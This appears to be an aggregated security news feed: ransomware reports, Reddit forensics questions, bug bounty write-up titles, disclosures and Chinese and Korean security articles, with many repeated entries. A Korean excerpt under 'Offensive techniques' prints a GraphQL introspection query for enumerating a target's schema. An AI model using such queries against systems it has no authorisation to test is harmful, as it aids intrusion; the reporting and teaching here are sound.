    FreeBuf早报 | 新的暗网市场声称与犯罪卡特尔有关;思科被燕洛网勒索软件团伙黑
    一家汽车供应商的系统在 5 月的两周内被三个不同的勒索软件团伙破坏并加密了文件。
    思科证实被勒索攻击,泄露数据2.8GB
    思科证实,Yanluowang勒索软件集团在今年5月下旬入侵了公司网络,攻击者试图以泄露被盗数据威胁索要赎金。
    深入调查揭秘钓鱼邮件背后的故事
    共同探讨”钓鱼邮件背后的故事”中解密在钓鱼邮件后隐藏的惊天玩法。
    因从事间谍活动,前Twitter员工最高可判20年监禁
    因窃取 Twitter 用户有关的私人信息,并将数据交给沙特阿拉伯政府,美国公民Ahmad Abouammo将最高面临 20 年的监禁。
  • Open

    SD card locked/decrypted?
    I have a noname SD card that comes from a car-navigation system and it contains a lot of data. It is possible get the data by connecting the card to the navigation system and to a computer at the same time. This way, the navigation system seems to unlock the card and it gets mounted by my computer. I would prefer not to use the navigation system in this process but when i connect the card to my computer only, i can't access it. There is just a generic scsi driver available. Do you know anything like this? Is it possible to "lock" or encrypt the SD card? submitted by /u/Knuust [link] [comments]
  • Open

    [Open Proxy Project] 400+ Verified Proxies every 15 minutes!
    A collection of aggregated open proxies across the internet, cross-examined and maintained every 15 minutes via automation. Link: https://Oproxy.ml Source Code: https://github.com/midhunvnadh/Open-Proxy-Project https://preview.redd.it/zib9r1kp93h91.png?width=1280&format=png&auto=webp&s=e5c9a464a4151d5028340346f2198737f55938cd submitted by /u/MidhunVNadh [link] [comments]
  • Open

    Researching the Windows Registry
    The Windows Registry is a magical place that I love to research because there's always something new and fun to find, and apply to detections and DFIR analysis! Some of my recent research topics have included default behaviors with respect to running macros in Office documents downloaded from the Internet, default settings for mounting ISO/IMG files, as well as how to go about enabling RDP account lockouts based on failed login attempts.  Not long ago I ran across some settings specific to nested VHD files, and thought, well...okay, I've seen virtual machines installed on systems during incidents, as a means of defense evasion, and VHD/VHDX files are one such resource. Further, they don't require another application, like VMWare or VirtualBox. Digging a bit further, I found this MS documen…

  • Open

    How Cisco got hacked - insights on what the attackers did
    submitted by /u/jwizq [link] [comments]
    AWSGoat is a vulnerable by design infrastructure on AWS featuring the latest released OWASP Top 10 web application security risks (2021) and other misconfigured AWS services.
    submitted by /u/sanitybit [link] [comments]
    Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling
    submitted by /u/Fugitif [link] [comments]
    Cryptominer detection: a Machine Learning approach
    submitted by /u/MiguelHzBz [link] [comments]
    DeathStalker’s continuous strike at foreign and cryptocurrency exchanges
    submitted by /u/EspoJ [link] [comments]
    BlueHound combines information about user permissions, network access and unpatched vulnerabilities to reveal the paths attackers would take if they were inside your network.
    submitted by /u/sanitybit [link] [comments]
    PowerHuntShares is designed to automatically inventory, analyze, and report excessive privilege assigned to SMB shares on Active Directory domain joined computers
    submitted by /u/sanitybit [link] [comments]
    ÆPIC Leak: Intel CPU bug able to architecturally disclose sensitive data
    submitted by /u/sanitybit [link] [comments]
    A Novel SIP Based Distributed Reflection Denial-of-Service Attack and an Effective Defense Mechanism
    submitted by /u/sanitybit [link] [comments]
    Everything In Its Right Place - Part 2
    submitted by /u/Gallus [link] [comments]
    From Shared Dash to Root Bash :: Pre-Authenticated RCE in VMWare vRealize Operations Manager
    submitted by /u/Gallus [link] [comments]
  • Open

    How I earned a $6000 bug bounty from Cloudflare
    Introduction: Continue reading on Medium »
    Defeat the HttpOnly flag to achieve Account Takeover | RXSS
    Hello folks, I’m Mohamed Tarek aka Timooon at Bugcrowd and HackerOne, In this write up I will explain how I get the victim’s session when… Continue reading on Medium »
    Email Confirmation bypass at Instagram
    This story is all about a logical vulnerability which helped me in Bypassing the email confirmation process and adding any arbitrary… Continue reading on Medium »
    403 Forbidden Bypass Leading to Admin Endpoint Access.
    Hi everyone! This is my first write-up, pardon me for any mistakes. I’ll share my tip with everyone how I was able to bypass a 403… Continue reading on Medium »
    Enhancing Subdomain Enumeration — ENTs and NOERROR
    Identifying subdomains more reliably by checking DNS status codes and empty nodes Continue reading on SSE Blog »
    Stealing Gas From dYdX, 0.5 ETH A Day
    Gas is liquid gold. Back in February 2022, we found a way to abuse a feature called “Gasless Deposits” on dYdX exchange that could allow… Continue reading on Medium »
    Tudo (na verdade o básico) sobre Directory Traversal [PT/BR]
    Hoje eu resolvi fazer um pouco diferente, normalmente eu tenho mais o hábito de escrever sobre write-ups do que sobre as vulnerabilidades… Continue reading on Medium »
  • Open

    OSSIM Python Boolean Expression
    I am trying to get ossim to send me an email when a specific file is accessed. I have already set everything up so that OSSIM will send me an email when a file is accessed BUT I am trying to make it more granular to send an email when a specific file is accessed. Currently in Define Logical Condition I have PBE: FILENAME == "D:\Depts\Shared\test.txt" This does not trigger an email when I open the file. I can see in the event logs that the event is there and if I delete out the PBE and set condition to ANY, I will receive an email after opening this file. Any suggestions? I have tried different spacing, caps/no caps, etc. It appears to work on my other Actions when I filter by specific usernames, but not for FILENAME. submitted by /u/Sufficient-Bed2280 [link] [comments]
    I change everything but again Instagram detects me !!!!
    Hi guys, I change my device, my public Dynamic IP, username, password, email, browser, app, cookies, and everything and again Instagram knows it's me, and my question was do you know IG can spot public dynamic IPs are coming from the same person or they know me another way? (because in this case I used a proxy and the problem was solved! though dynamic IP didn't help). I know of device fingerprinting but because I change everything I don't think it's the case. this case only affects me not persons in my region so it's not related to geolocation which is rough and not exact. what Instagram does is illegal in this case considering tracking this way without knowledge of the user. submitted by /u/amir_hossein0001 [link] [comments]
    Is Fortinet considered a righ risk VPN?
    Our company cyber security insurance identified Fortinet Fortigate VPN as a high risk due to "numerous critical code exploits". Instead they are pushing Zscaler or other ZTNA solution. submitted by /u/brainstormer77 [link] [comments]
    How secure is TCG Opal 2.0?
    I found various sources that claim that TCG Opal isn't really secure compared to something like LUKS/dm-crypt encryption (for example this video), but I don't seem to fully understand under what circumstances that is actually true. It looks like the standard itself isn't the problem, but rather the implementation of the SSD manufacturers. Is that true and how "dangerous" would it be to only use that encryption on a modern laptop with one of the latest SSDs and a standard threat level? Hope this is the right sub & thx in advance. submitted by /u/-_----_-- [link] [comments]
    safe to reset and use a phone found in a house clearance?
    Hi looking for advice I got a phone from a house clearance, everything in the house was going to the trash anyway ready for a new tenant to move in, the phones not amazing but it's better than my current one. Just wondering if resetting it would remove any potential weird things like tracking/spying software? Just got me a bit paranoid that the house was weird and full of other phones and watches... I got the feeling a drug dealer may have lived there previously. But wondering if resetting this phone will make it safe to use? It's a Samsung. submitted by /u/Spliceofcake [link] [comments]
    Viewing Thycotic secrets
    Is there a way to log when a user views only their own password/secrets? or when a user views any password in general ? submitted by /u/No_Cranberry_2292 [link] [comments]
    Fake positive Golden Ticket Tenable.ad
    Hello everyone, I have a question for people who have Tenable.ad in their infrastructure. We have had some feedback from Golden Ticket on our Tenable.AD tool. As a precaution, we shut down our infrastructure for security reasons before reopening it. According to our initial analysis, this could be a false positive alert. Have you ever had this on your Tenable.ad. If so, through what means? Through authentication on a server? A machine account (ex: hostname$) Thanks a lot for your help :) submitted by /u/Captain_AdamBzh [link] [comments]
    How do you check the real IP hosting server hidden behind Cloudflare?
    I have read this blog generally talking hidden IP address of deepfake pornography website owner who victimized over 190 Kpop idols. https://blog.criminalip.io/2022/08/04/deepfake-porn-site/ They said they can find real IP hidden behind cloudflare using nslookup. But they ended in a vague sense. Does anybody can tell specificaly how to check Real IP that is hidden by vpn, proxy, or cloud flare and etc. I really want and need more details on this... thanks! submitted by /u/Glad_Living3908 [link] [comments]
  • Open

    Exchange/Azure AD pen testing resources. Any tips or good articles about this?
    submitted by /u/One_Appeal_4080 [link] [comments]
    Advice for 2nd Interview for Red Team Internship
    The qualifications for the internship: Has or is pursuing all of the following -pursuing a relevant bachelor's degree -good communication skills, can work within a team and meet deadlines -basic knowledge of network protocols My first interview wasn't a technical interview. The interviewer just asked me basic questions about myself to get to know me and why I wanted to intern at their company specifically. She informed me that the second interview will be done by three people: two security consultants from their red team and a manager of business solutions. To give some insight as to what the internship will be like, during my first interview I asked my interviewer what to expect to be doing day to day. She told me I would be working alongside the red team on their current project. I would also work on the helpdesk a little. And I would get to work with the business consulting team as well to see how they meet with clients. This is all to try to give me different aspects of what their company does and give me solid hands on experience. She did say primarily though that the internship focuses on working with the red team. My question is what should I expect from the second interview? Are they expecting me to be able to answer technical questions about pentesting? I have some experience doing CTF's. I am by no means a master at them but I have been doing them everyday to try to learn more and improve. Any questions that I should expect to see so I can prepare for them? Any advice would be appreciated! Thank you in advance! submitted by /u/tyllanth [link] [comments]
  • Open

    BlueSky Ransomware: Fast Encryption via Multithreading
    BlueSky ransomware is an emerging family that has adopted modern techniques to evade security defenses. Read our technical analysis. The post BlueSky Ransomware: Fast Encryption via Multithreading appeared first on Unit 42.
  • Open

    Sisyphus and the CVE Feed: Vulnerability Management at Scale
    Article URL: https://medium.com/airbnb-engineering/sisyphus-and-the-cve-feed-vulnerability-management-at-scale-e2749f86a7a4 Comments URL: https://news.ycombinator.com/item?id=32415629 Points: 1 # Comments: 0
  • Open

    Sisyphus and the CVE Feed: Vulnerability Management at Scale
    Article URL: https://medium.com/airbnb-engineering/sisyphus-and-the-cve-feed-vulnerability-management-at-scale-e2749f86a7a4 Comments URL: https://news.ycombinator.com/item?id=32415629 Points: 1 # Comments: 0
  • Open

    Hacker101 CTF — Travial CTF Flag 0
    No content preview
    Car Hacking: Cyber Security in Automotive Industry
    No content preview
    Write-up: Pickle Rick @ TryHackMe
    No content preview
    Hunting webshell with NeoPI
    No content preview
    RazorBlack: Active Directory Room From TryHackMe By Hashar Mujahid
    No content preview
    IIot, Operational Technology Cybersecurity Challenges
    No content preview
  • Open

    Hacker101 CTF — Travial CTF Flag 0
    No content preview
    Car Hacking: Cyber Security in Automotive Industry
    No content preview
    Write-up: Pickle Rick @ TryHackMe
    No content preview
    Hunting webshell with NeoPI
    No content preview
    RazorBlack: Active Directory Room From TryHackMe By Hashar Mujahid
    No content preview
    IIot, Operational Technology Cybersecurity Challenges
    No content preview
  • Open

    Hacker101 CTF — Travial CTF Flag 0
    No content preview
    Car Hacking: Cyber Security in Automotive Industry
    No content preview
    Write-up: Pickle Rick @ TryHackMe
    No content preview
    Hunting webshell with NeoPI
    No content preview
    RazorBlack: Active Directory Room From TryHackMe By Hashar Mujahid
    No content preview
    IIot, Operational Technology Cybersecurity Challenges
    No content preview
  • Open

    SecWiki News 2022-08-10 Review
    [HTB] Apocalyst Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-10 Review
    [HTB] Apocalyst Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    Enhancing Subdomain Enumeration — ENTs and NOERROR
    Identifying subdomains more reliably by checking DNS status codes and empty nodes Continue reading on SSE Blog »
    Why Is Automotive Cybersecurity So Important?
    What is automotive cybersecurity? Continue reading on Medium »
  • Open

    Enhancing Subdomain Enumeration — ENTs and NOERROR
    Identifying subdomains more reliably by checking DNS status codes and empty nodes Continue reading on SSE Blog »
    “Prendere in prestito, attraversare confini…”​
    (Ragionamento breve per una estate OSINT-addicted) Continue reading on Medium »
  • Open

    Log analysis practice tool
    Hey everybody. I am looking for sth that could help me improve my forensic skills. Idea is that there is a case, i can view some logs and i have to tell what happened and if machine was compromised or not. After looking through the logs I can check the answer. Any ideas if there is sth like that online? Thanks! submitted by /u/Full-Plankton-7607 [link] [comments]
    UFED 4PC and OPPO A54 5G problem
    Hi All, I found a problem in acquisition of a OPPO A54 5G with UFED 4 PC. I try Advanced Logical and Android Backup. I use dongle and set up the smartphone as directed by UFED (debug USB, allow App, always on), however the extraction fail always. Normally, at the beginning of an acquisition, the PC authorization request appears on the smartphone, but in this case it did not happen. I think this is the problem. Has anyone never happened? What to do in this case? Thanks! submitted by /u/Max_Steiner [link] [comments]
    Which software to make a preview of computer's hard disk?
    Hi all, I need to found the correct way to execute a preview of computer's hard disk, that allows me to see the files inside them like Encase would. I start the pc with linux live on USB. I can use Kali, Caine, Backbox or tsurugi; these guarantee me that the disk are write protect. At this point, without create a disk image, which software, in these linux distro, can I use to preview the hard disk like encase? thanks! submitted by /u/Max_Steiner [link] [comments]
    Cellebrite update disabled all USB ports.
    Hi friends, I recently upgraded Cellebrite UFED to the most recent update. Upon completing this, all USB ports on the machine became inactive. There are about 20 ports between the front and the back of this machine. The keyboard and mouse quit working, all plugged in USB drives were unrecognized. After uninstalling Cellebrite completely, all USB ports became active again. However, now, our EnCase dongle is unrecognized. Has anyone run into this issue? I found one article from 2020 and this is a known problem with UFED. submitted by /u/Fun_House2633 [link] [comments]
  • Open

    many commands can be manipulated to delete identities or affiliations
    Hyperledger disclosed a bug submitted by cet2000: https://hackerone.com/reports/348090 - Bounty: $500
    Read-only administrator can change agent update settings
    Acronis disclosed a bug submitted by mega7: https://hackerone.com/reports/1538004 - Bounty: $200
  • Open

    Rails (Ruby on Rails)
    🔍 Introduction Rails(Ruby on Rails, RoR)는 Ruby의 대표적인 프레임워크로 MVC 모델을 사용하는 풀스택 웹 프레임워크입니다. Ruby 특유의 쉽고 직관적인 문법으로 인해 Rails 또한 코드를 이해하는데 어렵지 않으며 scaffold 등의 기능으로 빠르게 웹 서비스를 구성할 수 있습니다. 이외에도 웹 서비스를 개발하는데 있어 필요한 여러가지 기술, 테크닉, 보안에 대한 부분이 많이 고려되어 있습니다. Installation sudo gem install rails Struct of Rails app Model config/database.yml : DB 접속정보 및 설정 db/migrate/* : active_record 관련 코드 app/models/* : model(db schema)에 관련된 코드 View app/views/* : Model, Controller와 연결된 View 코드들 Controller app/controllers/* : 컨트롤러 코드 config/routes.rb : 실제 라우팅이 명시되는 코드 Etc config/* : 어플리케이션에 대한 설정들 public/* : public 디렉토리 🕹 Snippet New Web App rails new {appname} New API App rails new {appname} --api or # config/application.rb config.api_only = true Generate with scaffold scaffold는 한번에 명령으로 MVC(Model, View, Controller)를 한번에 생성할 수 있는 기능입니다. rails g scaffold post title:string context:text types string text (long text, up to 64k, often used for text areas) datetime date integer binary boolean float decimal (for financial data) time timestamp references Migrate DB New model rails g model Scans name:string url:string Migration rake db:migrate Rollback rake db:rollback # 가장 최근 DB 상태로 되돌립니다. rake db:rallback STEP=2 #...
  • Open

    LyScript 一款x64dbg自动化调试插件
    一款 x64dbg 自动化控制插件,实现远程动态调试,解决了逆向工作者分析漏洞,反病毒人员脱壳,原生脚本不够强大的问题,加速漏洞利用程序的开发,辅助漏洞挖掘以及恶意软件分析。
    IPv6转换技术是什么?浅谈IPv6转换的两种技术方式
    与双栈技术和隧道技术相比,IPv6转换技术具备改造周期短、成本低、部署灵活等优势,是目前各大政企网站进行IPv6升级改造的主要方式。
    FreeBuf早报 | 刷单类电信网络诈骗案占全部电诈案四成;PyPI中发现新恶意Python库
    《云计算安全责任共担模型》行业标准已于2022年7月正式发布施行。
    Tomcat中间件漏洞复现
    Tomcat 一些漏洞复现
    警惕!黑客正在从分类信息网站上窃取信用卡
    攻击者还试图利用银行平台上的一次性有效密码(OTP)将资金直接转入其账户上。
    PyPI中发现新恶意Python库
    Check Point的安全研究人员在Python软件包索引(PyPI)上发现了10个恶意软件包。
    CISA警告Windows和UnRAR漏洞在野被利用
    近期美国网络安全和基础设施安全局 (CISA) 在其已知利用漏洞目录中增加了两个漏洞。其中一个已经在Windows支持诊断工具(MSDT)中作为零日漏洞了潜在了两年多的时间,并且它具有公开可用的漏洞利用代码。这两个安全问题的严重程度都很高,并且是目录遍历漏洞,可以帮助攻击者在目标系统上植入恶意软件。该漏洞编号为CVE-2022-34713,非正式地称为DogWalk,MSDT中的安全漏洞允许攻击者
    CISA警告Windows和UnRAR漏洞在野被利用
    近期美国网络安全和基础设施安全局 (CISA) 在其已知利用漏洞目录中增加了两个漏洞。其中一个已经在Windows支持诊断工具(MSDT)中作为零日漏洞了潜在了两年多的时间,并且它具有公开可用的漏洞利用代码。这两个安全问题的严重程度都很高,并且是目录遍历漏洞,可以帮助攻击者在目标系统上植入恶意软件。该漏洞编号为CVE-2022-34713,非正式地称为DogWalk,MSDT中的安全漏洞允许攻击者
    继Twilio后,Cloudflare员工也遭到了同样的钓鱼攻击
    有至少 76 名员工的个人或工作手机号码收到了钓鱼短信,一些短信也发送给了员工的家人。
  • Open

    Repost: TV Shows, audiobooks, NSFW content
    This was posted a year ago, but is still up with content people might be interested in if they missed this post (https://www.reddit.com/r/opendirectories/comments/ox9ife/08032021_daily_post/) http://195.154.165.20/data/TDownloads/ submitted by /u/JiminythecricketinOz [link] [comments]
  • Open

    Best ways to practice X86 Win exploit dev?
    Hi all :) Im currently started taking the OSED course from offsec, and my lab is starting to run out (30 days). I kinda finished all of the excercises there anywhy. Is there any recommendations on exploit excercises/sites focusing on win-x86 I can take? Monthly subscriptions sites are also fine if they are worth it Excercises including RE is fine, but even better are ones with only a "poc" script(acess violation) as I feel my main focus should be on the exploit building thank you! submitted by /u/Tasty_Diamond_69420 [link] [comments]

  • Open

    SD-PWN Part 4 — VMware VeloCloud — The Last Takeover?
    submitted by /u/biggorilla135 [link] [comments]
    Discovering Domains via a Timing Attack on Certificate Transparency
    submitted by /u/0xdea [link] [comments]
    Microsoft Office to publish symbols starting August 2022
    submitted by /u/TheDarthSnarf [link] [comments]
    Security Best Practices in PHP
    submitted by /u/pigoretee [link] [comments]
    LibAFL: A Framework to Build Modular and Reusable Fuzzers
    submitted by /u/domenukk [link] [comments]
    Advisory: Cisco Small Business RV Series Routers Web Filter Database Update Command Injection Vulnerability
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
    Auditing Crypto Wallets
    submitted by /u/catlasshrugged [link] [comments]
  • Open

    Execution Unit Scheduler Contention Side-Channel Vulnerability on AMD Processors
    Article URL: https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1039 Comments URL: https://news.ycombinator.com/item?id=32404209 Points: 2 # Comments: 0
    CVE-2020-2038: PAN-OS version 10.0 suffers from remote code exec vulnerability
    Article URL: https://security.paloaltonetworks.com/CVE-2020-2038 Comments URL: https://news.ycombinator.com/item?id=32400260 Points: 1 # Comments: 1
  • Open

    Get The Best Red-Team Penetration Testing
    The ‘red-team’ penetration test simulates real attack scenarios (“Friendly Hacking”) by bypassing security defenses while remaining… Continue reading on Medium »
    VAPT — Common & Uncommon Interview Questions! Episode-2
    This is a continuation of the amazing Common & Uncommon Interview Questions for VAPT. If you haven’t read the first article you can find… Continue reading on Medium »
  • Open

    [CRITICAL] Full account takeover without user interaction on sign with Apple flow
    Glassdoor disclosed a bug submitted by emanelyazji: https://hackerone.com/reports/1639802 - Bounty: $3000
    Ability to escape database transaction through SQL injection, leading to arbitrary code execution
    HackerOne disclosed a bug submitted by jobert: https://hackerone.com/reports/1663299
  • Open

    End to End: Testing Go Services
    A comprehensive example of testing at every layer. Continue reading on Udacity Eng & Data »
  • Open

    End to End: Testing Go Services
    A comprehensive example of testing at every layer. Continue reading on Udacity Eng & Data »
  • Open

    CVE-2020-2038: PAN-OS version 10.0 suffers from remote code exec vulnerability
    Article URL: https://security.paloaltonetworks.com/CVE-2020-2038 Comments URL: https://news.ycombinator.com/item?id=32400260 Points: 1 # Comments: 1
  • Open

    Creating a basic backdoor on an android mobile
    No content preview
    Stored XSS to Account Takeover : Going beyond document.cookie (Dumping IndexedDB)
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection vulnerability allowing login bypass
    No content preview
    About the discovery of another security vulnerability in NASA
    No content preview
    IW Weekly #15: Admin account takeover, IDOR broken authentication, CyberChef alternatives, Dark web…
    No content preview
  • Open

    Creating a basic backdoor on an android mobile
    No content preview
    Stored XSS to Account Takeover : Going beyond document.cookie (Dumping IndexedDB)
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection vulnerability allowing login bypass
    No content preview
    About the discovery of another security vulnerability in NASA
    No content preview
    IW Weekly #15: Admin account takeover, IDOR broken authentication, CyberChef alternatives, Dark web…
    No content preview
  • Open

    Creating a basic backdoor on an android mobile
    No content preview
    Stored XSS to Account Takeover : Going beyond document.cookie (Dumping IndexedDB)
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection vulnerability allowing login bypass
    No content preview
    About the discovery of another security vulnerability in NASA
    No content preview
    IW Weekly #15: Admin account takeover, IDOR broken authentication, CyberChef alternatives, Dark web…
    No content preview
  • Open

    Novel News on Cuba Ransomware aka Greetings From Tropical Scorpius
    Tropical Scorpius has been deploying Cuba Ransomware using novel tools and techniques, such as a new malware family, ROMCOM RAT. The post Novel News on Cuba Ransomware aka Greetings From Tropical Scorpius appeared first on Unit 42.
  • Open

    SecWiki News 2022-08-09 Review
    如何导入数十亿DNS数据到Elasticsearch中 by BaCde Fuzzing 之 Grammars by 路人甲 SharpTongue Deploys Clever Mail-Stealing Browser Extension by 路人甲 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-09 Review
    如何导入数十亿DNS数据到Elasticsearch中 by BaCde Fuzzing 之 Grammars by 路人甲 SharpTongue Deploys Clever Mail-Stealing Browser Extension by 路人甲 更多最新文章,请访问SecWiki
  • Open

    Bluey, movies and workout videos.
    submitted by /u/littlepreptalk [link] [comments]
    A website which has a lot of PDF files, mostly all scams.
    !!!DO NOT GO TO THESE SITES PROMISING FREE STUFF, ITS ALL A SCAM AND THEY WILL HACK YOU NO MATTER WHAT YOU DO!!! This site used to belong to a school located in India, which apparently was botted out by hackers. This website would fill up with a load of PDF Files with scams in them. Some are fake "I'm not a robot" verifications, some are Free Robux scams, some are relating to Minecraft scams, and many more. Files that belonged to the school still remain though. And another thing, files that belong to the school have names and important information on the PDF's. Read them at your own risk. There's now a new website that belongs to the school, and it still exists today, a school located in India named "Salwan Public School, Gurugram". If you want to check it out for yourself, here are the links: Hacked Indian school website New Indian school website (not hacked) Basically it's the same domain but the new website removed the "www" in the link. submitted by /u/SinisterYT06 [link] [comments]
  • Open

    GraphQL Injection
    🔍 Introduction GraphQL Injection은 GraphQL을 사용하는 환경에서의 Injection 공격을 의미합니다. GraphQL 특성 상 사용자가 요청한 Query는 하나의 서버 또는 복수의 서버에서 처리되어 결과를 리턴하기 떄문에 단순히 GraphQL 만의 문제가 아닌 SQL Injection이나 XXE 등 다른 취약점으로 연결될 가능성이 높습니다. 그래서 좁은 의미로는 GraphQL 자체 즉, Scheme과 Query 간에서 발생하는 공격을 의미하고, 넓게는 백엔드에서의 처리 문제로 인한 부분(SQLi, XXE 등)도 포함되기도 합니다. GraphQL에 대한 전반적인 보안 관련 내용은 “Cullinan > GraphQL Security” 참고해주세요. 🗡 Offensive techniques Detect 서비스에서 GraphQL을 사용하는 부분은 모두 테스팅 포인트가 됩니다. 보편적으로 /graphql 등의 경로를 많이 사용하며, 해당 경로가 아니더라도 query를 포함한 경우 GrphQL 서비스로 확인합니다. GraphQL의 Endpoint를 찾았다면 Schema, Query 영역에 특수문자 등을 통해 의도되지 않은 동작이나 에러가 발생하도록 시도합니다. Exploitation Enum via Introspection Query Introspection Query는 GraphQL에서 스키마와 쿼리에 대한 정보를 질의할 수 있도록 제공하는 쿼리입니다. __schema를 이용한 쿼리 기법이고 GraphQL 전체 구조를 질의할 수 있도록 쿼리를 구성할 수 있습니다. query IntrospectionQuery { __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated...
  • Open

    Free tool to process forensic artefacts (DD, Kape etc.) in AWS
    https://www.cadosecurity.com/cado-community-edition/ submitted by /u/zenomeno [link] [comments]
    Zero to Hero Malware Reverse Engineering & Threat Intelligence
    submitted by /u/cybersocdm [link] [comments]
    How to export all data from Confluence
    Does anyone know how can I export the entire Confluence for the organization? It seems that native export is missing calendars and blogs. submitted by /u/urengoy [link] [comments]
    How to quarantine/isolate a laptop?
    I have a laptop coming in for forensic examination and I am nervous. The edr software we have on it has a quarantine feature that failed. So far I have remotely shutdown the computer, reset the users password and disabled the computer account in AD. I am afraid when I turn it on it will auto connect to the company wifi. I dont have a faraday cage, but would a switch just connected to a power source and nothing else be sufficient?? submitted by /u/Enes_24 [link] [comments]
  • Open

    Everything you need to know about starting a career in bug bounty hunting
    Introduction Continue reading on Medium »
    TOP Cross-Chain Bridge Open Test Is Underway
    Since the emergence of DeFi, the congestion and high GAS fees of the Ethereum has hit heated discussions and led to the emergence of many… Continue reading on TOP Network »
    Pentester Promiscuous Notebook
    gitbook for keeping my pentest notes on hand. It’s far from being perfect in terms of organization (that’s why I call it “promiscuous”)… Continue reading on Medium »
    How Bug Bounty Can Help You Gain Confidence
    If you’re looking for a way to gain confidence, earn some extra money and get a job as a penetration tester, then bug bounty might be for… Continue reading on Medium »
  • Open

    Zero to Hero Malware Reverse Engineering & Threat Intelligence
    submitted by /u/cybersocdm [link] [comments]
  • Open

    FreeBuf早报 | 谷歌搜索遭遇全球性宕机;多家电商平台个人信息遭泄露
    据报道,美国有超过 4 万人报告无法使用谷歌搜索,还有英国、澳大利亚、新加坡的用户也都报告了谷歌宕机问题。
    FreeBuf成都网络安全企业调研正式开启
    现诚邀本土网络安全厂商积极参与,踊跃报名!
    企业网络安全最佳实践指南(七)
    本系列文章共分为8篇,主要分享作者自身在企业网络安全建设和运维保障过程中的经验总结,包括网络安全管理、网络安全架构、网络安全技术以及安全实践等,力求全方位阐述企业在网路安全中的方方面面,为企业网络安全
    企业网络安全最佳实践指南(六)
    本系列文章共分为8篇,主要分享作者自身在企业网络安全建设和运维保障过程中的经验总结,包括网络安全管理、网络安全架构、网络安全技术以及安全实践等,力求全方位阐述企业在网路安全中的方方面面,为企业网络安全
    斗象出席CICV科技周专题论坛,共话车联网安全能力建设
    2022-8-9 23:58:59
    微软禁用宏后攻击者的适应与进化
    研究人员认为,攻击者以后会越来越多地使用容器类文件进行投递,减少对宏代码附件的依赖。
    Meta打击南亚滥用Facebook的网络攻击活动
    Facebook母公司Meta披露,它对南亚的两个攻击组织采取了反制行动,这两个组织都是利用其社交媒体平台向潜在目标分发恶意软件。
    员工被钓鱼,云通讯巨头Twilio客户数据遭泄露
    Twilio表示,有攻击者利用短信网络钓鱼攻击窃取了员工凭证,并潜入内部系统泄露了部分客户数据。
    丹麦7-11门店因网络攻击而关闭
    因遭受了网络攻击,丹麦7-11门店的支付和结账系统全面故障,故而选择闭店。
  • Open

    Browsers automatically connect to ports 8008 and 8009
    Hi, I checked the open TCP connections on my machine using Sysinternals TCPView. I saw that I have open connections from Chrome to ports 8008 and 8009 on a machine in my LAN. It seems like the address of my Xiaomi Mi Box. I noticed that when I open Chrome/Firefox/Edge it automatically connects to this address and ports. I performed a quick Google search, didn't find too much information about these ports, but some mention them as related to Chromecast. I'm trying to understand if this is something legit, and what makes by browser automatically connect to this address, is there some sort of auto discovery process for these devices? Or is it possible (hopefully not) that I have some malware? Any information will be appreciated. Thanks, Gabriel submitted by /u/gabrielszt [link] [comments]
    I rooted my phone. Am I compromised?
    I used FonePaw data recovery tool's android root feature to root my phone. The recovery failed, but I sure as hell am rooted. Certain apps on my android homepage has changed location several times without me doing it. Sometimes I see my phone light up like getting a notification but don't get anything. Is my phone compromised? submitted by /u/remidentity [link] [comments]
  • Open

    Fuzzing 之 Grammars
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org Fuzzing input Fuzzing的一大核心思想其实就是通过大量的Input去触发程序的各个分支逻辑,因此Fuzzing的成功与否和Input的生成关系密切。Input的格式多种多样,可以是文件,代码,json数据等等。但是各种各样的...
    Spring 场景下突破 pebble 模板注入限制
    作者:Y4tacker 原文链接:https://tttang.com/archive/1692/ 写在前面 之前周末忙着强网杯,对这道题只做了一半就搁置下来了,最后卡在绕过最新pebble模板引擎RCE那里,今天抽空来继续进行剩下的分析,正好题目里有几个在现实场景当中能用的trick顺便也分享了 题目环境分析 也是挺不错题目直接给了docker环境便于本地搭建,同时设置了权限需要执行./g...
  • Open

    Fuzzing 之 Grammars
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org Fuzzing input Fuzzing的一大核心思想其实就是通过大量的Input去触发程序的各个分支逻辑,因此Fuzzing的成功与否和Input的生成关系密切。Input的格式多种多样,可以是文件,代码,json数据等等。但是各种各样的...
    Spring 场景下突破 pebble 模板注入限制
    作者:Y4tacker 原文链接:https://tttang.com/archive/1692/ 写在前面 之前周末忙着强网杯,对这道题只做了一半就搁置下来了,最后卡在绕过最新pebble模板引擎RCE那里,今天抽空来继续进行剩下的分析,正好题目里有几个在现实场景当中能用的trick顺便也分享了 题目环境分析 也是挺不错题目直接给了docker环境便于本地搭建,同时设置了权限需要执行./g...
  • Open

    Storm Kitty Reversal by Your friendly Homeless Hacker / Reverser
    Prynt Stealer Stub 4.5.1 We can see there are around 13 classes in the MSIL executable that consist of screen clipping keylogging stealers… Continue reading on Medium »

  • Open

    An Attacker's Perspective
    Something I've thought about quite often during my time in DFIR is the threat actor's perspective...what is the attacker seeing and thinking during their time in an infrastructure. As a DFIR analyst, I don't often get to 'see' the threat actor's actions, at least not fully. Rather, my early perspective was based solely on what was left behind. That's changed and expanded over the years, as we've moved from WinXP/2000/2003 to Win7 and Win10, and added some modicum of enterprise capability by deploying EDR. During the better part of my time as a responder, EDR was something deployed after an incident had been detected, but the technology we deployed at that time had a targeted "look back" capability that most current EDR technologies do not incorporate. This allowed us to quickly target the …
  • Open

    Why do we still use unencrypted networking protocols (like HTTP)?
